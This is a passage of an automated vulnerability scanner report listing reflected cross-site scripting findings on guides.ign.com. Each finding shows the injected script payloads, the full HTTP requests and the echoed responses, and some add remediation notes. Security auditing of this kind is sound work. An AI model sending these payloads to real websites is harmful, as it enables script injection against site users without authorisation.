Date: Mon, 07 Feb 2011 01:51:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-27912-202697953-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043500981v-1n-12mc+1297043500981mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 103524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14354229/?63fce"><script>alert(1)</script>0df05f822a8=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.227. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/57512/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b175"><script>alert(1)</script>368b0241e73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/57512/?2b175"><script>alert(1)</script>368b0241e73=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:42 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-1130846996-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:42 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043502870v-1n-12mc+1297043502870mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/57512/?2b175"><script>alert(1)</script>368b0241e73=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.228. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/57512/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d1a"-alert(1)-"2edcddf6365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/57512/?18d1a"-alert(1)-"2edcddf6365=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-1825-1308755600-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043509654v-1n-12mc+1297043509654mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 103290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/57512/?18d1a"-alert(1)-"2edcddf6365=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.229. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /index/nintendo-ds-guides/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7965"><script>alert(1)</script>dd303f9c616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/nintendo-ds-guides/index.html?d7965"><script>alert(1)</script>dd303f9c616=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:52:06 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32462-185637828-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:52:06 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043526579v-1n-12mc+1297043526579mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/index/nintendo-ds-guides/index.html?d7965"><script>alert(1)</script>dd303f9c616=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.230. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /index/nintendo-ds-guides/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae7f8"-alert(1)-"ca818502e9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/nintendo-ds-guides/index.html?ae7f8"-alert(1)-"ca818502e9b=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:52:12 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26954-200633787-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:52:12 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043532207v-1n-12mc+1297043532207mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 115750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
== 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/index/nintendo-ds-guides/index.html?ae7f8"-alert(1)-"ca818502e9b=1",
        c5:"",
        c6:"",
        c15:"" });
       v